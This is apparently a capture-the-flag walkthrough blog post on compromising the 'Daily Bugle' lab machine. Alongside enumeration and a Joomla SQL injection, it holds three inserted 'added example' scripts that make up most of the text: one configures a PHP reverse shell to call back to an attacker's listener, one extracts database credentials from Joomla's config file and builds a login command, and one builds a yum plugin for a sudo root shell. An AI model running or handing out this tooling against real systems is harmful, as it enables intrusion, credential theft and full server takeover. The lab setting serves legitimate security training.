If you had to choose between Marvel and DC, who would you choose? I think we all have a favorite, but we cannot deny the fact that we all like Spiderman. This is not a fact but an opinion, so don't hold me to this bold statement! 😅
Today we are going to hack the Daily Bugle, are you ready? 🕵️♀️
Okay, now that we've launched our machine and had a look around its main page, we can start enumerating. Open up your terminal and start an nmap scan to see which services are running (-sV fingerprints service versions; -Pn skips the host-discovery ping, which the lab network may block).
nmap -sV -Pn <your machine IP>
We can see that SSH, HTTP and MySQL are running. Let's continue with a gobuster scan to see which hidden directories we can find.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://<your machine IP> -t 50
When we head over to <ip>/administrator, we see that it opens up a Joomla! login page. Okay, now we need to find the version that is running. We can do this with joomscan.
joomscan -u http://<your machine IP>/administrator/
Joomscan reports the running version and shows that there is a valid SQL injection exploit available for us to use. We can exploit it by finding a Python exploit, or by running sqlmap (which takes forever). I'll show you the Python script way, since the lab instructions encourage us to try it. You can go over to Exploit-DB and download this exploit if you are doing the sqlmap method, but we won't be able to use that version directly. Instead we need a Python conversion of this exploit. Luckily, I got you!
Download the python exploit from here.
I renamed this file as exploit.py and saved it in my ~/Downloads directory. Now, go back into your terminal and cd into the directory of the downloaded exploit. If you read the instructions from the GitHub page above, you will see that we need to install two packages, so let's do that. While we're at it, let's also make exploit.py executable.
pip install art
pip install beautifulsoup4
chmod +x exploit.py
You can download the reverse shell from Pentestmonkey's website or via the following command:
Once you're logged in, head over to your Joomla dashboard and navigate to the Template Customizer. Now grab the reverse shell file that you just downloaded (it will be in your Downloads directory, and you'll have to extract it) and paste its contents into the template's index.php (or error.php) file. Remember to change the IP address (and port, if you like) in the reverse shell to the IP of your attacking machine (your OpenVPN address) and save. Start a listener on that port (for example nc -lvnp <port>) before you browse to the modified page, so the shell has somewhere to connect back to.
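Editing the IP and port by hand is where people usually slip (a typo in the address means a shell that never calls back). The script below is an added example, not code from the original post or from Pentestmonkey; it assumes the downloaded php-reverse-shell.php still carries its stock `$ip = '127.0.0.1';  // CHANGE THIS` and `$port = 1234;       // CHANGE THIS` lines, validates your input, rewrites those two lines, and tells you which listener to start.

```shell
#!/bin/sh
# Added example (not from the original post): set the callback address in
# pentestmonkey's php-reverse-shell.php and print the matching listener.
# Assumes the file still has its stock lines:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS

# patch_reverse_shell FILE IP PORT: rewrite the $ip/$port assignments in FILE
patch_reverse_shell() {
    file=$1; new_ip=$2; new_port=$3
    # sanity-check the inputs before touching the file
    echo "$new_ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' \
        || { echo "bad ip: $new_ip" >&2; return 1; }
    case $new_port in ''|*[!0-9]*) echo "bad port: $new_port" >&2; return 1 ;; esac
    # refuse to continue if the template lines are not where we expect them
    grep -q "^[$]ip = '" "$file"  || { echo "no \$ip line in $file" >&2; return 1; }
    grep -q "^[$]port = " "$file" || { echo "no \$port line in $file" >&2; return 1; }
    # [$] is a literal dollar sign to sed; write to a temp file for portability
    sed -e "s/^[$]ip = '[^']*';/\$ip = '$new_ip';/" \
        -e "s/^[$]port = [0-9]*;/\$port = $new_port;/" "$file" > "$file.tmp" \
        && mv "$file.tmp" "$file"
}

# show_callback FILE: print "ip port" currently configured in FILE
show_callback() {
    cb_ip=$(sed -n "s/^[$]ip = '\([^']*\)';.*/\1/p" "$1")
    cb_port=$(sed -n "s/^[$]port = \([0-9]*\);.*/\1/p" "$1")
    echo "$cb_ip $cb_port"
}

# usage: sh prep_shell.sh php-reverse-shell.php <attacker ip> <port>
if [ "$#" -eq 3 ]; then
    patch_reverse_shell "$@" && echo "now listen with: nc -lvnp $3"
fi
```

Run it against the extracted file, start the listener it prints, and only then paste the shell into the template; show_callback is there so you can confirm what the file will dial out to before you save it on the target.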
Next, let's cd into /var/www/html, the web root of the site, and list the files there. One file of interest is configuration.php, Joomla's main config file, which stores the database host, database name, username and password in clear text (you can read each file; this is all trial and error to find a file that has valuable information). Passwords found this way are often reused for local accounts, so they are worth trying elsewhere on the box as well.
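Rather than eyeballing the whole file, you can pull the database settings out of configuration.php directly. This is an added example, not code from the original post: it relies only on Joomla's documented `public $user = '...';` style of settings inside class JConfig, and the sample config in the usage below is constructed, not taken from the lab machine.

```shell
#!/bin/sh
# Added example (not from the original post): read the database settings out of a
# Joomla configuration.php, where they sit as "public $user = '...';" lines in class JConfig.

# joomla_cfg FILE KEY: print the value of "public $KEY = '...';" (first match only)
joomla_cfg() {
    sed -n "s/^[[:space:]]*public [$]$2 = '\([^']*\)';.*/\1/p" "$1" | head -n 1
}

# joomla_db_creds FILE: print "host db user password" on one line, fail if none found
# (values containing spaces would need quoting; Joomla's own defaults never do)
joomla_db_creds() {
    cfg=$1
    db_host=$(joomla_cfg "$cfg" host)
    db_name=$(joomla_cfg "$cfg" db)
    db_user=$(joomla_cfg "$cfg" user)
    db_pass=$(joomla_cfg "$cfg" password)
    [ -n "$db_user" ] && [ -n "$db_pass" ] \
        || { echo "no database credentials in $cfg" >&2; return 1; }
    echo "$db_host $db_name $db_user $db_pass"
}

# joomla_mysql_cmd FILE: the mysql command line to try those credentials from the box
joomla_mysql_cmd() {
    creds=$(joomla_db_creds "$1") || return 1
    set -- $creds
    echo "mysql -h $1 -u $3 -p'$4' $2"
}

# usage: sh joomla_creds.sh /var/www/html/configuration.php
if [ "$#" -eq 1 ]; then
    joomla_db_creds "$1" && joomla_mysql_cmd "$1"
fi
```

The same joomla_cfg helper works for any other setting in the file (sitename, dbprefix, secret), which is handy when you want to check whether the Joomla admin table is reachable under a custom prefix.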
Okay, so we are in the final stretch of completing this CTF. Let's see what sudo privileges we have via the sudo -l command. I apologize for the poor screenshot I took. What is important is that we can run yum as root via sudo.
Let's head over to GTFObins and see how we can abuse yum. As the GTFObins entry puts it: if the yum binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
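The GTFObins sudo trick for yum works by pointing yum at a config file you control, which in turn loads a Python plugin you wrote; yum runs the plugin's init_hook as root, so a hook that exec's /bin/sh gives you a root shell. The script below is an added example that writes that technique out (it is not code from the original post, and the sudo -l line it is checked against is constructed); it only builds the files and prints the command, leaving the actual sudo invocation to you. It targets classic yum with its Python plugin API; dnf-based systems do not take this path.

```shell
#!/bin/sh
# Added example (not from the original post): the GTFObins "sudo yum" plugin trick
# as a script. yum reads a config file we point it at with -c, loads Python plugins
# from the pluginpath in that file, and runs their init_hook as root, so a plugin
# that exec's /bin/sh hands us a root shell. Works with classic yum (Python plugin
# API); dnf-based systems do not take this path.

# sudo_allows_yum: read "sudo -l" output on stdin, succeed if yum may run via sudo
sudo_allows_yum() {
    grep -Eq '^[[:space:]]*\([^)]*\)[^:]*:?[[:space:]]*(/usr/bin/)?yum([[:space:],]|$)'
}

# build_yum_plugin [DIR]: write config + plugin into DIR (default: new temp dir), print DIR
build_yum_plugin() {
    dir=${1:-$(mktemp -d)}
    # x: a yum config that turns plugins on and points yum at our directory
    cat > "$dir/x" <<EOF
[main]
plugins=1
pluginpath=$dir
pluginconfpath=$dir
EOF
    # y.conf: enables the plugin called "y"
    cat > "$dir/y.conf" <<'EOF'
[main]
enabled=1
EOF
    # y.py: the plugin; init_hook fires as soon as yum loads it
    cat > "$dir/y.py" <<'EOF'
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version = '2.1'
def init_hook(conduit):
    os.execl('/bin/sh', '/bin/sh')
EOF
    echo "$dir"
}

# yum_escalate_cmd DIR: the sudo invocation that loads the plugin from DIR
yum_escalate_cmd() {
    echo "sudo yum -c $1/x --enableplugin=y"
}

# usage: sudo -l | sh yum_esc.sh --check   (builds the plugin and prints the command)
if [ "${1:-}" = "--check" ]; then
    if sudo_allows_yum; then
        d=$(build_yum_plugin)
        echo "yum is sudo-able; run: $(yum_escalate_cmd "$d")"
    else
        echo "sudo -l output does not list yum" >&2
        exit 1
    fi
fi
```

The -c flag is what makes this work: yum trusts whatever pluginpath the supplied config names, and sudo never sees a path it could refuse. If the sudoers entry restricts yum's arguments, the check passes but the command will be rejected, so read the full sudo -l line rather than just the binary name.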
You just hacked the Daily Bugle, congratulations! I hope that this was easy enough for you to follow, and until next time, happy hacking! 😁
See more on my GitHub.